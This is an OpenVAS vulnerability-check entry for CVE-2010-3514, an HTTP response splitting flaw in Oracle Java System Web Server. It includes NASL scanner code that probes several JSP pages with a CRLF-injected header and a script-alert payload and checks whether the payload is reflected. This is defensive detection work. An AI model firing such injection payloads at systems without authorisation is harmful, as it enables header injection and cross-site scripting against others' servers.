openvas
Copyright (C) 2010 Greenbone AG
OPENVAS:1361412562310801532
History: Nov 02, 2010 - 12:00 a.m.

Oracle Java System Web Server HTTP Response Splitting Vulnerability - Active Check

plugins.openvas.org

CVSS2: 4.3 Medium
  Attack Vector: NETWORK
  Attack Complexity: MEDIUM
  Authentication: NONE
  Confidentiality Impact: NONE
  Integrity Impact: PARTIAL
  Availability Impact: NONE
  Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

AI Score: 6.3 Medium (Confidence: Low)

EPSS: 0.002 Low (Percentile: 61.0%)

Oracle Java System Web Server is prone to an HTTP response
splitting vulnerability.

# SPDX-FileCopyrightText: 2010 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.801532");
  script_version("2023-10-27T05:05:28+0000");
  script_tag(name:"last_modification", value:"2023-10-27 05:05:28 +0000 (Fri, 27 Oct 2023)");
  script_tag(name:"creation_date", value:"2010-11-02 18:01:36 +0100 (Tue, 02 Nov 2010)");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");

  script_cve_id("CVE-2010-3514");

  script_tag(name:"qod_type", value:"remote_analysis");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("Oracle Java System Web Server HTTP Response Splitting Vulnerability - Active Check");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2010 Greenbone AG");
  script_family("Web Servers");
  script_dependencies("gb_get_http_banner.nasl");
  script_mandatory_keys("SunWWW/banner");
  script_require_ports("Services/www", 80);

  script_tag(name:"summary", value:"Oracle Java System Web Server is prone to an HTTP response
  splitting vulnerability.");

  script_tag(name:"insight", value:"The flaw is due to input validation error in the
  'response.setHeader()' method which is not properly sanitising before being returned to the user.
  This can be exploited to insert arbitrary HTTP headers, which will be included in a response sent
  to the user.");

  script_tag(name:"affected", value:"Oracle Java System Web Server 6.x/7.x.");

  script_tag(name:"solution", value:"Apply the referenced vendor update.");

  script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to conduct a
  cross-site scripting (XSS) and browser cache poisoning attacks.");

  script_xref(name:"URL", value:"http://inj3ct0r.com/exploits/14530");
  script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/15290/");
  script_xref(name:"URL", value:"http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html#AppendixSUNS");
  script_xref(name:"URL", value:"http://sunsolve.sun.com/search/document.do?assetkey=1-79-1215353.1-1");

  exit(0);
}

include("http_func.inc");
include("port_service_func.inc");

port = http_get_port(default: 80);

banner = http_get_remote_headers(port: port);
if (!banner || "Server: Sun-" >!< banner)
  exit(0);

host = http_host_name(port: port);

foreach files (make_list("login.jsp", "index.jsp", "default.jsp", "admin.jsp")) {

  url = "/" + files + "?ref=http://" + host +
        "/%0D%0AContent-type:+text/html;%0D%0A%0D%0ATEST%3Cscript%3Ealert(111)%3C/script%3E";

  req = http_get(item: url, port: port);
  res = http_send_recv(port: port, data: req);

  if (egrep(string: res, pattern:"^HTTP/1\.[01] 200") && "TEST<script>alert(111)</script>" >< res) {
    report = http_report_vuln_url(port: port, url: url);
    security_message(port: port, data: report);
    exit(0);
  }
}

exit(99);
